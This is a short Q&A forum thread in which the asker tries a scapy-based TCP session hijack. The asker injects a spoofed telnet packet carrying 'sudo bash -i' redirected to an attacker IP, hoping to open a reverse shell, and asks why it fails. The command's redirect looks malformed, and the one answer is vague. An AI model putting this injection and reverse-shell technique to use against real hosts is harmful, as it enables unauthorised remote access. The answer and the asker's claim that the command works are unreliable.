# How to send command using scapy?

Tags: scapy

I am learning on how to do reverse shell using scapy by using spoofed IP address(legitimate host) and mac address.

I am  using this command :

```
send(IP(src="192.168.0.114",dst="192.168.0.113")/TCP(sport=54484,dport=23,seq=2034533561,ack=1565253469)/ Raw(load="sudo bash -i > /home/192.168.0.112/9090”))
```

I can see in wireshark that the server(192.168.0.113) accepted the packet, but never trigger the reverse shell connection to the attacker (192.168.0.112)

What am I doing wrong here ? Still quite new in using scapy.

Thanks in advance.

Comment: For a reverse shell, you'd have a server running on the attacker, with the victim attempting to initiate a connection back to the attacker. If the victim is hosting the server, that sounds like a bind shell instead.

Comment: Yes, I run the server on the attacker. I tested this command manually "sudo bash -i > /home/192.168.0.112/9090" and it run successfully. The only problem when I tried to use scapy. Either I am doing the scapy command injection wrong or other things. I can see that the server accepting my connection (no RST)

Answer (score 0):

I think your server should extract the data from the packet, after that transfers the data to be readable text which could be running on the server shell.